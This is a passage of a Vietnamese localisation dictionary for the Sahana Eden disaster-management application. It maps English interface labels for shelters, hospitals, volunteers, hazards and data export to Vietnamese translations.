'Chỉnh sửa kinh nghiệm nghề nghiệp', 'Edit Profile Configuration': 'Chỉnh sửa định dạng hồ sơ tiểu sử', 'Edit Program': 'Chỉnh sửa chương trình', 'Edit Project Organization': 'Chỉnh sửa tổ chức thực hiện dự án', 'Edit Project': 'Chỉnh sửa dự án', 'Edit Projection': 'Chỉnh sửa dự đoán', 'Edit Question Meta-Data': 'Chỉnh sửa siêu dữ liệu câu hỏi', 'Edit Record': 'Chỉnh sửa hồ sơ', 'Edit Recovery Details': 'Chỉnh sửa chi tiết khôi phục', 'Edit Report': 'Chỉnh sửa báo cáo', 'Edit Repository Configuration': 'Chỉnh sửa định dạng lưu trữ', 'Edit Request Item': 'Chỉnh sửa yêu cầu hàng hóa', 'Edit Request': 'Chỉnh sửa yêu cầu', 'Edit Requested Skill': 'Chỉnh sửa kỹ năng được yêu cầu', 'Edit Resource Configuration': 'Chỉnh sửa định dạng nguồn', 'Edit Resource': 'Chỉnh sửa tài nguyên', 'Edit Response': 'Chỉnh sửa phản hồi', 'Edit Role': 'Chỉnh sửa vai trò', 'Edit Room': 'Chỉnh sửa phòng', 'Edit SMS Message': 'Chỉnh sửa tin nhắn SMS', 'Edit SMS Settings': 'Chỉnh sửa cài đặt tin nhắn SMS', 'Edit SMTP to SMS Settings': 'Chỉnh sửa SMTP sang cài đặt SMS', 'Edit Sector': 'Chỉnh sửa lĩnh vực', 'Edit Setting': 'Chỉnh sửa cài đặt', 'Edit Settings': 'Thay đổi thiết lập', 'Edit Shelter Service': 'Chỉnh sửa dịch vụ cư trú', 'Edit Shelter': 'Chỉnh sửa thông tin cư trú', 'Edit Shipment Item': 'Chỉnh sửa hàng hóa trong lô hàng vận chuyển', 'Edit Site': 'Chỉnh sửa thông tin trên website ', 'Edit Skill Equivalence': 'Chỉnh sửa kỹ năng tương đương', 'Edit Skill Type': 'Chỉnh sửa loại kỹ năng', 'Edit Skill': 'Chỉnh sửa kỹ năng', 'Edit Staff Assignment': 'Chỉnh sửa phân công cán bộ', 'Edit Staff Member Details': 'Chỉnh sửa thông tin chi tiết của cán bộ', 'Edit Status': 'Chỉnh sửa tình trạng', 'Edit Supplier': 'Chỉnh sửa nhà cung cấp', 'Edit Survey Answer': 'Chỉnh sửa trả lời khảo sát', 'Edit Survey Series': 'Chỉnh sửa chuỗi khảo sát', 'Edit Survey Template': 'Chỉnh sửa mẫu điều tra', 'Edit Symbology': 'Chỉnh sửa biểu tượng', 'Edit Synchronization Settings': 'Chỉnh sửa cài đặt đồng bộ hóa', 'Edit Task': 'Chỉnh sửa nhiệm vụ', 'Edit Team': 'Chỉnh sửa Đội/Nhóm', 'Edit Template Section': 'Chỉnh sửa nội dung trong biểu mẫu', 'Edit Theme Data': 'Chỉnh sửa dữ liệu chủ đề', 'Edit Theme': 'Chỉnh sửa chủ đề', 'Edit Training Event': 'Chỉnh sửa sự kiện tập huấn', 'Edit Training': 'Chỉnh sửa tập huấn', 'Edit Tropo Settings': 'Chỉnh sửa cài đặt Tropo', 'Edit Twilio Settings': 'Chỉnh sửa cài đặt Twilio', 'Edit User': 'Chỉnh sửa người sử dụng', 'Edit Vehicle Assignment': 'Chỉnh sửa phân công phương tiện vận chuyển', 'Edit Volunteer Cluster Position': 'Chỉnh sửa vị trí nhóm tình nguyện viên', 'Edit Volunteer Cluster Type': 'Chỉnh sửa loại hình nhóm tình nguyện viên', 'Edit Volunteer Cluster': 'Chỉnh sửa nhóm tình nguyện viên', 'Edit Volunteer Details': 'Chỉnh sửa thông tin tình nguyện viên', 'Edit Volunteer Registration': 'Chỉnh sửa đăng ký tình nguyện viên', 'Edit Volunteer Role': 'Chỉnh sửa vai trò tình nguyện viên', 'Edit Vulnerability Aggregated Indicator': 'Chỉnh sửa chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'Edit Vulnerability Data': 'Chỉnh sửa dữ liệu về tình trạng dễ bị tổn thương', 'Edit Vulnerability Indicator Sources': 'Chỉnh sửa nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'Edit Vulnerability Indicator': 'Chỉnh sửa chỉ số đánh giá tình trạng dễ bị tổn thương', 'Edit Warehouse Stock': 'Chỉnh sửa hàng lưu kho', 'Edit Warehouse': 'Chỉnh sửa kho hàng', 'Edit Web API Settings': 'Chỉnh sửa Cài đặt Web API', 'Edit current record': 'Chỉnh sửa hồ sơ hiện tại', 'Edit message': 'Chỉnh sửa tin nhắn', 'Edit saved search': 'Chỉnh sửa tìm kiếm đã lưu', 'Edit the Application': 'Chỉnh sửa ứng dụng', 'Edit the OpenStreetMap data for this area': 'Chỉnh sửa dữ liệu bản đồ OpenStreetMap cho vùng này', 'Edit this Disaster Assessment': 'Chỉnh sửa báo cáo đánh giá thảm họa này', 'Edit this entry': 'Chỉnh sửa hồ sơ này', 'Edit': 'Chỉnh sửa', 'Editable?': 'Có thể chỉnh sửa', 'Education & Advocacy': 'Giáo dục và Vận động chính sách', 'Education & School Safety': 'Giáo dục và An toàn trong trường học', 'Education Details': 'Thông tin về trình độ học vấn', 'Education details added': 'Thông tin về trình độ học vấn đã được thêm', 'Education details deleted': 'Thông tin về trình độ học vấn đã được xóa', 'Education details updated': 'Thông tin về trình độ học vấn đã được cập nhật', 'Education materials received': 'Đã nhận được tài liệu, dụng cụ phục vụ học tập', 'Education materials, source': 'Dụng cụ học tập, nguồn', 'Education': 'Trình độ học vấn', 'Either a shelter or a location must be specified': 'Nhà tạm hoặc vị trí đều cần được nêu rõ', 'Either file upload or document URL required.': 'File để tải lên hoặc được dẫn tới tài liệu đều được yêu cầu.', 'Either file upload or image URL required.': 'File để tải lên hoặc được dẫn tới hình ảnh đều được yêu cầu.', 'Elevated': 'Nâng cao lên', 'Email Address to which to send SMS messages. Assumes sending to phonenumber@address': 'Địa chỉ email để gửi tin nhắn SMS. Giả định gửi đến số điện thoại', 'Email Address': 'Địa chỉ email', 'Email Details': 'Thông tin về địa chỉ email', 'Email InBox': 'Hộp thư đến trong email', 'Email Setting Details': 'Thông tin cài đặt email', 'Email Setting deleted': 'Cài đặt email đã được xóa', 'Email Settings': 'Cài đặt email', 'Email address verified, however registration is still pending approval - please wait until confirmation received.': 'Địa chỉ email đã được xác nhận, tuy nhiên đăng ký vẫn còn chờ duyệt - hãy đợi đến khi nhận được phê chuẩn', 'Email deleted': 'Email đã được xóa', 'Email settings updated': 'Cài đặt email đã được cập nhật', 'Emergency Contact': 'Thông tin liên hệ trong trường hợp khẩn cấp', 'Emergency Contacts': 'Thông tin liên hệ trong trường hợp khẩn cấp', 'Emergency Department': 'Bộ phận cấp cứu', 'Emergency Health': 'Chăm sóc sức khỏe trong tình huống khẩn cấp', 'Emergency Medical Technician': 'Nhân viên y tế EMT', 'Emergency Shelter': 'Nhà tạm trong tình huống khẩn cấp', 'Emergency Support Facility': 'Bộ phận hỗ trợ khẩn cấp', 'Emergency Support Service': 'Dịch vụ hỗ trợ khẩn cấp', 'Emergency Telecommunication': 'Truyền thông trong tình huống khẩn cấp', 'Emergency Telecommunications': 'Thông tin liên lạc trong tình huống khẩn cấp', 'Emergency contacts': 'Thông tin liên hệ khẩn cấp', 'Employment type': 'Loại hình lao động', 'Enable in Default Config?': 'Cho phép ở cấu hình mặc định?', 'Enable': 'Cho phép', 'Enable/Disable Layers': 'Kích hoạt/Tắt Layer', 'Enabled': 'Được cho phép', 'End Date': 'Ngày kết thúc', 'End date': 'Ngày kết thúc', 'Enter Completed Assessment Form': 'Nhập biểu mẫu đánh giá đã hoàn thiện', 'Enter Completed Assessment': 'Nhập báo cáo đánh giá đã hoàn thiện', 'Enter Coordinates in Deg Min Sec': 'Nhập tọa độ ở dạng Độ,Phút,Giây', 'Enter a name for the spreadsheet you are uploading (mandatory).': 'Nhập tên cho bảng tính bạn đang tải lên(bắt buộc)', 'Enter a new support request.': 'Nhập một yêu cầu hỗ trợ mới', 'Enter a summary of the request here.': 'Nhập tóm tắt các yêu cầu ở đây', 'Enter a valid email': 'Nhập địa chỉ email có giá trị', 'Enter a value carefully without spelling mistakes, this field will be crosschecked.': 'Nhập giá trị cẩn thận tránh các lỗi chính tả, nội dung này sẽ được kiểm tra chéo', 'Enter indicator ratings': 'Nhập xếp hạng chỉ số', 'Enter keywords': 'Từ khóa tìm kiếm', 'Enter some characters to bring up a list of possible matches': 'Nhập một vài ký tự để hiện ra danh sách có sẵn', 'Enter the same password as above': 'Nhập lại mật khẩu giống như trên', 'Enter your first name': 'Nhập tên của bạn', 'Enter your organization': 'Nhập tên tổ chức của bạn', 'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': 'Nhập số điện thoại là không bắt buộc, tuy nhiên nếu nhập số điện thoại bạn sẽ có thể nhận được các tin nhắn', 'Entity': 'Pháp nhân', 'Entry added to Asset Log': 'Ghi chép đã được thêm vào nhật ký tài sản', 'Environment': 'Môi trường', 'Epidemic': 'Dịch bệnh', 'Epidemic/Pandemic Preparedness': 'Phòng dịch', 'Error File missing': 'Lỗi không tìm thấy file', 'Error in message': 'Lỗi trong tin nhắn', "Error logs for '%(app)s'": "Báo cáo lỗi cho '%(app)s'", 'Errors': 'Lỗi', 'Essential Staff?': 'Cán bộ Chủ chốt?', 'Estimated # of households who are affected by the emergency': 'Ước tính # số hộ chịu ảnh hưởng từ thiên tai', 'Estimated Delivery Date': 'Thời gian giao hàng dự kiến', 'Estimated Value per Pack': 'Giá trị dự tính mỗi gói', 'Ethnicity': 'Dân tộc', 'Euros': 'Đồng Euro', 'Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)': 'Đánh giá thông tin trong thư. (giá trị này KHÔNG NÊN sử dụng trong các ứng dụng cảnh báo công cộng)', 'Event Type': 'Loại Sự kiện', 'Event type': 'Loại sự kiện ', 'Events': 'Sự kiện', 'Example': 'Ví dụ', 'Excellent': 'Tuyệt vời', 'Excreta Disposal': 'Xử lý phân', 'Expected Out': 'Theo dự kiến', 'Experience': 'Kinh nghiệm', 'Expiration Date': 'Ngày hết hạn', 'Expiration Details': 'Thông tin về hết hạn', 'Expiration Report': 'Báo cáo hết hạn', 'Expired': 'Đã hết hạn', 'Expiring Staff Contracts Report': 'Hợp đồng lao động sắp hết hạn', 'Expiry (months)': 'Hết hạn (tháng)', 'Expiry Date': 'Ngày hết hạn', 'Expiry Date/Time': 'Ngày/Giờ hết hạn', 'Expiry Time': 'Hạn sử dụng ', 'Explanation about this view': 'Giải thích về quan điểm này', 'Explosive Hazard': 'Hiểm họa cháy nổ', 'Export Data': 'Xuất dữ liệu', 'Export all Completed Assessment Data': 'Chiết xuất toàn bộ dữ liệu đánh giá đã hoàn thiện', 'Export as Pootle (.po) file (Excel (.xls) is default)': 'Chiết xuất định dạng file Pootle (.po) (định dạng excel là mặc định)', 'Export as': 'Chiết suất tới', 'Export in EDXL-HAVE format': 'Chiết suất ra định dạng EDXL-HAVE ', 'Export in GPX format': 'Chiết xuất định dạng file GPX', 'Export in HAVE format': 'Chiết suất định dạng HAVE', 'Export in KML format': 'Chiết suất định dạng KML', 'Export in OSM format': 'Chiết xuất định dạng OSM', 'Export in PDF format': 'Chiết suất định dạng PDF', 'Export in RSS format': 'Chiết suất định dạng RSS', 'Export in XLS format': 'Chiết suất định dạng XLS', 'Export to': 'Chiết suất tới', 'Eye Color': 'Màu mắt', 'FAIR': 'CÔNG BẰNG', 'FROM': 'TỪ', 'Facial hair, color': 'Màu râu', 'Facial hair, length': 'Độ dài râu', 'Facial hair, type': 'Kiểu râu', 'Facilities': 'Bộ phận', 'Facility Contact': 'Thông tin liên hệ của bộ phận', 'Facility Details': 'Thông tin về bộ phận', 'Facility Type Details': 'Thông tin về loại hình bộ phận', 'Facility Type added': 'Loại hình bộ phận đã được thêm', 'Facility Type deleted': 'Loại hình bộ phận đã được xóa', 'Facility Type updated': 'Loại hình bộ phận đã được cập nhật', 'Facility Types': 'Loại hình bộ phận', 'Facility added': 'Bộ phận đã được thêm', 'Facility deleted': 'Bộ phận đã được xóa', 'Facility updated': 'Bộ phận đã được cập nhật', 'Facility': 'Bộ phận', 'Fail': 'Thất bại', 'Failed to approve': 'Không phê duyệt thành công', 'Fair': 'công bằng', 'Falling Object Hazard': 'Hiểm họa vật thể rơi từ trên cao', 'Family': 'Gia đình', 'Family/friends': 'Gia đình/Bạn bè', 'Feature Info': 'Thông tin chức năng', 'Feature Layer Details': 'Thông tin về lớp chức năng', 'Feature Layer added': 'Lớp chức năng đã được thêm', 'Feature Layer deleted': 'Lớp chức năng đã được xóa', 'Feature Layer updated': 'Lớp chức năng đã được cập nhật', 'Feature Layer': 'Lớp Chức năng', 'Feature Layers': 'Lớp Chức năng', 'Feature Namespace': 'Vùng tên chức năng', 'Feature Request': 'Yêu cầu chức năng', 'Feature Type': 'Loại chức năng', 'Features Include': 'Chức năng bao gồm', 'Feedback': 'Phản hồi', 'Female headed households': 'Phụ nữ đảm đương công việc nội trợ', 'Female': 'Nữ', 'Few': 'Một vài', 'File Uploaded': 'File đã được tải lên', 'File uploaded': 'File đã được tải lên', 'Fill out online below or ': 'Điền thông tin trực tuyến vào phía dưới hoặc', 'Filter Field': 'Ô lọc thông tin', 'Filter Options': 'Lựa chọn lọc', 'Filter Value': 'Giá trị lọc', 'Filter by Category': 'Lọc theo danh mục', 'Filter by Country': 'Lọc theo quốc gia', 'Filter by Organization': 'Lọc theo tổ chức', 'Filter by Status': 'Lọc theo tình trạng', 'Filter type ': 'Hình thức lọc', 'Filter': 'Bộ lọc', 'Financial System Development': 'Xây dựng hệ thống tài chính', 'Find Recovery Report': 'Tìm Báo cáo phục hồi', 'Find by Name': 'Tìm theo tên', 'Find': 'Tìm', 'Fingerprint': 'Vân tay', 'Fingerprinting': 'Dấu vân tay', 'Fire Station': 'Trạm chữa cháy', 'Fire Stations': 'Trạm chữa cháy', 'Fire': 'Hỏa hoạn', 'First Name': 'Tên', 'First': 'Trang đầu', 'Flash Flood': 'Lũ Quét', 'Flash Freeze': 'Lạnh cóng đột ngột', 'Flood Alerts': 'Báo động lũ', 'Flood Report Details': 'Chi tiết báo cáo tình hình lũ lụt', 'Flood Report added': 'Báo cáo lũ lụt đã được thêm', 'Flood Report updated': 'Đã cập nhật báo cáo tình hình lũ lụt ', 'Flood': 'Lũ lụt', 'Focal Point': 'Tiêu điểm', 'Fog': 'Sương mù', 'Food Security': 'An ninh lương thực', 'Food': 'Thực phẩm', 'For Entity': 'Đối với đơn vị', 'For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP).': 'Đối với POP-3 thường sử dụng 110 (995 cho SSL), đối với IMAP thường sử dụng 143 (993 cho IMAP).', 'For each sync partner, there is a default sync job that runs after a specified interval of time. You can also set up more sync jobs which could be customized on your needs. Click the link on the right to get started.': 'Đối với mỗi đối tác đồng bộ, có một công việc đồng bộ mặc định chạy sau một khoảng thời gian nhất định. Bạn cũng có thể thiết lập thêm công việc đồng bộ hơn nữa để có thể tùy biến theo nhu cầu. Nhấp vào liên kết bên phải để bắt đầu', 'For live help from the Sahana community on using this application, go to': 'Để được giúp đỡ trực tuyến từ cộng đồng Sahana về sử dụng phần mềm ứng dụng, mời đến', 'For more details on the Sahana Eden system, see the': 'Chi tiết hệ thống Sahana Eden xem tại', 'Forest Fire': 'Cháy rừng', 'Form Settings': 'Cài đặt biểu mẫu', 'Formal camp': 'Trại chính thức', 'Format': 'Định dạng', 'Found': 'Tìm thấy', 'Framework added': 'Khung chương trình đã được thêm', 'Framework deleted': 'Khung chương trình đã được xóa', 'Framework updated': 'Khung chương trình đã được cập nhật', 'Framework': 'Khung chương trình', 'Frameworks': 'Khung chương trình', 'Freezing Drizzle': 'Mưa bụi lạnh cóng', 'Freezing Rain': 'Mưa lạnh cóng', 'Freezing Spray': 'Mùa phùn lạnh cóng', 'Frequency': 'Tần suất', 'From Facility': 'Từ bộ phận', 'From Warehouse/Facility/Office': 'Từ Kho hàng/Bộ phận/Văn phòng', 'From': 'Từ', 'Frost': 'Băng giá', 'Fulfil. Status': 'Điền đầy đủ tình trạng', 'Full beard': 'Râu rậm', 'Full-time': 'Chuyên trách', 'Fullscreen Map': 'Bản đồ cỡ lớn', 'Function Permissions': 'Chức năng cho phép', 'Function for Value': 'Chức năng cho giá trị', 'Function': 'Chức năng', 'Functions available': 'Chức năng sẵn có', 'Funding Report': 'Báo cáo tài trợ', 'Funding': 'Kinh phí', 'Fundraising, income generation, in-kind support, partnership': 'Gây quỹ, tạo thu nhập, hỗ trợ bằng hiện vật, hợp tác', 'Funds Contributed by this Organization': 'Tài trợ đóng góp bởi tổ chức này', 'Funds Contributed': 'Kinh phí được tài trợ', 'GIS & Mapping': 'GIS & Lập bản đồ', 'GO TO ANALYSIS': 'ĐẾN MỤC PHÂN TÍCH', 'GO TO THE REGION': 'ĐẾN KHU VỰC', 'GPS Data': 'Dữ liệu GPS', 'GPS Marker': 'Dụng cụ đánh dấu GPS', 'GPS Track File': 'File vẽ GPS', 'GPS Track': 'Đường vẽ GPS', 'GPX Layer': 'Lớp GPX', 'Gale Wind': 'Gió mạnh', 'Gap Analysis Map': 'Bản đồ phân tích thiếu hụt', 'Gap Analysis Report': 'Báo cáo phân tích thiếu hụt', 'Gauges': 'Máy đo', 'Gender': 'Giới', 'Generate portable application': 'Tạo ứng dụng cầm tay', 'Generator': 'Bộ sinh', 'GeoJSON Layer': 'Lớp GeoJSON', 'GeoRSS Layer': 'Lớp GeoRSS', 'Geocoder Selection': 'Lựa chọn các mã địa lý', 'Geometry Name': 'Tên trúc hình', 'Get Feature Info': 'Lấy thông tin về chức năng', 'Give a brief description of the image, e.g. what can be seen where on the picture (optional).': 'Đưa ra chú thích hình ảnh ngắn gọn, vd: có thể xem gì ở đâu trên bức hình này (không bắt buộc).', 'Global Messaging Settings': 'Cài đặt hộp thư tin nhắn toàn cầu', 'Go to Functional Map': 'Tới bản đồ chức năng', 'Go to Request': 'Đến mục yêu cầu', 'Go to the': 'Đến', 'Go': 'Thực hiện', 'Goatee': 'Chòm râu dê', 'Good Condition': 'Điều kiện tốt', 'Good': 'Tốt', 'Goods Received Note': 'Giấy nhận Hàng hóa', 'Google Layer': 'Lớp Google', 'Governance': 'Quản lý nhà nước', 'Grade Code': 'Bậc lương', 'Grade': 'Tốt nghiệp hạng', 'Graduate': 'Đại học', 'Graph': 'Đường vẽ', 'Great British Pounds': 'Bảng Anh', 'Greater than 10 matches. Please refine search further': 'Tìm thấy nhiều hơn 10 kết quả. Hãy nhập lại từ khóa', 'Grid': 'Hiển thị dạng lưới', 'Group Description': 'Mô tả về nhóm', 'Group Details': 'Thông tin về nhóm', 'Group Head': 'Trưởng Nhóm', 'Group Members': 'Thành viên Nhóm', 'Group Memberships': 'Hội viên nhóm', 'Group Name': 'Tên nhóm', 'Group Type': 'Loại hình nhóm', 'Group added': 'Nhóm đã được thêm', 'Group deleted': 'Nhóm đã được xóa', 'Group description': 'Mô tả Nhóm', 'Group type': 'Loại nhóm', 'Group updated': 'Nhóm đã được cập nhật', 'Group': 'Nhóm', 'Grouped by': 'Nhóm theo', 'Groups': 'Nhóm', 'Guide': 'Hướng dẫn', 'HFA Priorities': 'Ưu tiên HFA', 'HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation.': 'HFA1: Đảm bảo rằng giảm thiểu rủi ro thảm họa là ưu tiên quốc gia và địa phương với một nền tảng tổ chức mạnh mễ để thực hiện hoạt động', 'HFA2: Identify, assess and monitor disaster risks and enhance early warning.': 'HFA2: Xác định, đánh giá và giám sát rủi ro thảm họa và tăng cường cảnh báo sớm.', 'HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels.': 'HFA3: Sử dụng kiến thức, sáng kiến và tập huấn để xây dựng cộng đồng an toàn ở mọi cấp.', 'HFA4: Reduce the underlying risk factors.': 'HFA4: Giảm các yếu tố rủi ro gốc rễ', 'HFA5: Strengthen disaster preparedness for effective response at all levels.': 'HFA5: Tăng cường phòng ngừa thảm họa để đảm bảo ứng phó hiệu quả ở mọi cấp.', 'HIGH RESILIENCE': 'MỨC ĐỘ AN TOÀN CAO', 'HIGH': 'CAO', 'Hail': 'Mưa đá', 'Hair Color': 'Màu tóc', 'Hair Length': 'Độ dài tóc', 'Hair Style': 'Kiểu tóc', 'Has the %(GRN)s (%(GRN_name)s) form been completed?': 'Mẫu %(GRN)s (%(GRN_name)s) đã được hoàn thành chưa?', 'Has the Certificate for receipt of the shipment been given to the sender?': 'Chứng nhận đã nhận được lô hàng đã gửi đến người gửi chưa?', 'Hazard Details': 'Thông tin vê hiểm họa', 'Hazard Points': 'Điểm hiểm họa', 'Hazard added': 'Hiểm họa đã được thêm', 'Hazard deleted': 'Hiểm họa đã được xóa', 'Hazard updated': 'Hiểm họa đã được cập nhật', 'Hazard': 'Hiểm họa', 'Hazardous Material': 'Vật liệu nguy hiểm', 'Hazardous Road Conditions': 'Điều kiện đường xá nguy hiểm', 'Hazards': 'Hiểm họa', 'Header Background': 'Nền vùng trên', 'Health & Health Facilities': 'CSSK & Cơ sở CSSK', 'Health Insurance': 'Bảo hiểm y tế', 'Health center': 'Trung tâm y tế', #'Health': 'Sức khỏe', 'Health': 'CSSK', 'Heat Wave': 'Đợt nắng nóng kéo dài', 'Heat and Humidity': 'Nóng và ẩm', 'Height (cm)': 'Chiều cao (cm)', 'Height (m)': 'Chiều cao (m)', 'Height': 'Chiều cao', 'Help': 'Trợ giúp', 'Helps to monitor status of hospitals': 'Hỗ trợ giám sát trạng thái các bệnh viện', 'Helps to report and search for Missing Persons': 'Hỗ trợ báo cáo và tìm kếm những người mất tích', 'Hide Chart': 'Ẩn biểu đồ', 'Hide Pivot Table': 'Ẩn Pivot Table', 'Hide Table': 'Ẩn bảng', 'Hide': 'Ẩn', 'Hierarchy Level 1 Name (e.g. State or Province)': 'Hệ thống tên cấp 1 (ví dụ Bang hay Tỉnh)', 'Hierarchy Level 2 Name (e.g. District or County)': 'Hệ thống tên cấp 2 (ví dụ Huyện hay thị xã)', 'Hierarchy Level 3 Name (e.g. City / Town / Village)': 'Hệ thống tên cấp 3 (ví dụ Thành phố/thị trấn/xã)', 'Hierarchy Level 4 Name (e.g. Neighbourhood)': 'Hệ thống tên cấp 4 (ví dụ xóm làng)', 'Hierarchy Level 5 Name': 'Hệ thống tên cấp 5', 'Hierarchy': 'Thứ tự', 'High School': 'Phổ thông', 'High Water': 'Nước Cao', 'High': 'Cao', 'Hindu': 'Người theo đạo Hindu', 'History': 'Lịch sử', 'Hit the back button on your browser to try again.': 'Bấm nút trở lại trên màn hình để thử lại', 'Home Address': 'Địa chỉ nhà riêng', 'Home Country': 'Bản quốc', 'Home Crime': 'Tội ác tại nhà', 'Home phone': 'Điện thoại nhà riêng', 'Home Town': 'Nguyên quán', 'Home': 'Trang chủ', 'Hospital Details': 'Chi tiết thông tin bệnh viện', 'Hospital Status Report': 'Báo cáo tình trạng bệnh viện', 'Hospital information added': 'Đã thêm thông tin Bệnh viện', 'Hospital information deleted': 'Đã xóa thông tin bệnh viện', 'Hospital information updated': 'Đã cập nhật thông tin bệnh viện', 'Hospital status assessment.': 'Đánh giá trạng thái bệnh viện', 'Hospital': 'Bệnh viện', 'Hospitals': 'Bệnh viện', 'Host National Society': 'Hội QG chủ nhà', 'Host': 'Chủ nhà', 'Hot Spot': 'Điểm Nóng', 'Hour': 'Thời gian', 'Hourly': 'Theo giờ', 'Hours Details': 'Thông tin về thời gian hoạt động', 'Hours Model': 'Chuyên trách/ kiêm nhiệm', 'Hours added': 'Thời gian hoạt động đã được thêm', 'Hours by Program Report': 'Thời gian hoạt động theo chương trình', 'Hours by Role Report': 'Thời gian hoạt động theo vai trò', 'Hours deleted': 'Thời gian hoạt động đã được xóa', 'Hours updated': 'Thời gian hoạt động đã được cập nhật', 'Hours': 'Thời gian hoạt động', 'Households below %(br)s poverty line': 'Hộ gia đình dưới %(br)s mức nghèo', 'Households below poverty line': 'Hộ gia đình dưới mức nghèo', 'Households': 'Hộ gia đình', 'Housing Repair & Retrofitting': 'Sửa chữa và cải tạo nhà', 'How data shall be transferred': 'Dữ liệu sẽ được chuyển giao như thế nào', 'How local records shall be updated': 'Hồ sơ địa phương sẽ được cập nhật thế nào', 'How many Boys (0-17 yrs) are Injured due to the crisis': 'Đối tượng nam trong độ tuổi 0-17 bị thương trong thiên tai', 'How many Boys (0-17 yrs) are Missing due to the crisis': 'Có bao nhiêu bé trai (0 đến 17 tuổi) bị mất tích do thiên tai', 'How many Girls (0-17 yrs) are Injured due to the crisis': 'Đối tượng nữ từ 0-17 tuổi bị thương trong thiên tai', 'How many Men (18 yrs+) are Dead due to the crisis': 'Bao nhiêu người (trên 18 tuổi) chết trong thảm họa', 'How many Men (18 yrs+) are Missing due to the crisis': 'Đối tượng nam 18 tuổi trở lên mất tích trong thiên tai', 'How many Women (18 yrs+) are Dead due to the crisis': 'Đối tượng nữ từ 18 tuổi trở lên thiệt mạng trong thiên tai', 'How many Women (18 yrs+) are Injured due to the crisis': 'Số nạn nhân là nữ trên 18 tuổi chịu ảnh hưởng của cuộc khủng hoảng', 'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'Mức độ chi tiết có thể xem. Mức phóng to cao có thể xem được nhiều chi tiết, nhưng không xem được diện tích rộng. Mức Phóng thấp có thể xem được diện tích rộng, nhưng không xem được nhiều chi tiết.', 'How often you want to be notified. If there are no changes, no notification will be sent.': 'Mức độ thường xuyên bạn muốn nhận thông báo. Nếu không có thay đổi, bạn sẽ không nhận được thông báo.', 'How you want to be notified.': 'Bạn muốn được thông báo như thế nào.', 'Human Resource Assignment updated': 'Phân bổ nguồn nhân lực đã được cập nhật', 'Human Resource Assignments': 'Phân bổ nguồn nhân lực', 'Human Resource Details': 'Thông tin về nguồn nhân lực', 'Human Resource assigned': 'Nguồn nhân lực được phân bổ', 'Human Resource Development': 'Phát triển nguồn nhân lực', 'Human Resource unassigned': 'Nguồn nhân lực chưa được phân bổ', 'Human Resource': 'Nguồn Nhân lực', 'Human Resources': 'Nguồn Nhân lực', 'Hurricane Force Wind': 'Gió mạnh cấp bão lốc', 'Hurricane': 'Bão lốc', 'Hygiene Promotion': 'Tăng cường vệ sinh', 'Hygiene kits, source': 'Dụng cụ vệ sinh, nguồn', 'I accept. Create my account.': 'Tôi đồng ý. Tạo tài khoản của tôi', 'ICONS': 'BIỂU TƯỢNG', 'ID Card Number': 'Số Chứng mính thư nhân dân', 'ID Tag Number': 'Số nhận dạng thẻ', 'ID type': 'Loại giấy tờ nhận dạng', 'ID': 'Thông tin nhận dạng', 'IEC Materials': 'Tài liệu tuyên truyền', 'INDICATOR RATINGS': 'XẾP LOẠI CHỈ SỐ', 'INDICATORS': 'CHỈ SỐ', 'Ice Pressure': 'Sức ép băng tuyết', 'Iceberg': 'Tảng băng', 'Identification label of the Storage bin.': 'Nhãn xác định Bin lưu trữ', 'Identifier Name for your Twilio Account.': 'Xác định tên trong tài khoản Twilio của bạn', 'Identifier which the repository identifies itself with when sending synchronization requests.': 'Xác định danh mục lưu trữ nào cần được yêu cầu đồng bộ hóa', 'Identities': 'Các Chứng minh', 'Identity Details': 'Chi tiết Chứng minh', 'Identity added': 'Thêm Chứng minh', 'Identity deleted': 'Xóa Chứng minh', 'Identity updated': 'Cập nhất Chứng minh', 'Identity': 'Chứng minh ND', 'If a ticket was issued then please provide the Ticket ID.': 'Nếu vé đã được cấp, vui lòng cung cấp mã vé', 'If a user verifies that they own an Email Address with this domain, the Approver field is used to determine whether & by whom further approval is required.': 'Nếu người dùng xác nhận rằng họ sở hữu địa chỉ email với miền này, ô Người phê duyệt sẽ được sử dụng để xác định xem liệu có cần thiết phải có phê duyệt và phê duyệt của ai.', 'If checked, the notification will contain all modified records. If not checked, a notification will be send for each modified record.': 'Nếu chọn, thông báo sẽ bao gồm toàn bộ hồ sơ được chỉnh sửa. Nếu không chọn, thông báo sẽ được gửi mỗi khi có hồ sơ được chỉnh sửa', 'If it is a URL leading to HTML, then this will downloaded.': 'Nếu đó là đường dẫn URL dẫn đến trang HTML, thì sẽ được tải xuống', 'If neither are defined, then the Default Marker is used.': 'Nếu cả hai đều không được xác định, thì đánh dấu mặc định sẽ được sử dụng.', 'If none are selected, then all are searched.': 'Nếu không chọn gì, thì sẽ tìm kiếm tất cả.', 'If not found, you can have a new location created.': 'Nếu không tìm thấy, bạn có thể tạo địa điểm mới.', 'If the location is a geographic area, then state at what level here.': 'Nếu địa điểm là một vùng địa lý thì cần nêu rõ là cấp độ nào ở đây.', 'If the person counts as essential staff when evacuating all non-essential staff.': 'Nếu người đó là cán bộ chủ chốt khi đó sẽ sơ tán mọi cán bộ không quan trọng.', 'If the request is for %s, please enter the details on the next screen.': 'Nếu yêu cầu là %s thì xin mời nhập các chi tiết vào trang tiếp theo.', 'If the request type is "Other", please enter request details here.': "Nếu loại yêu cầu là 'Khác', xin nhập chi tiết của yêu cầu ở đây.", 'If this field is populated then a user with the Domain specified will automatically be assigned as a Staff of this Organization': 'Nếu trường này đã nhiều người khi đó người dùng có chức năng tổ chức sẽ được tự động phân bổ như là Cán bộ của tổ chức.', 'If this is set to True then mails will be deleted from the server after downloading.': 'Nếu đã được xác định là Đúng thư sau đó sẽ bị xóa khỏi máy chủ sau khi tải về', 'If this record should be restricted then select which role is required to access the record here.': 'Nếu hồ sơ này cần bị hạn chế truy cập, lựa chọn ở đây chức năng nào có thể truy cập vào hồ sơ này ', 'If this record should be restricted then select which role(s) are permitted to access the record here.': 'Nếu hồ sơ này cần bị hạn chế truy cập, lựa chọn ở đây những chức năng nào được quyền truy cập vào hồ sơ này ', 'If yes, specify what and by whom': 'Nếu có, hãy ghi rõ đã 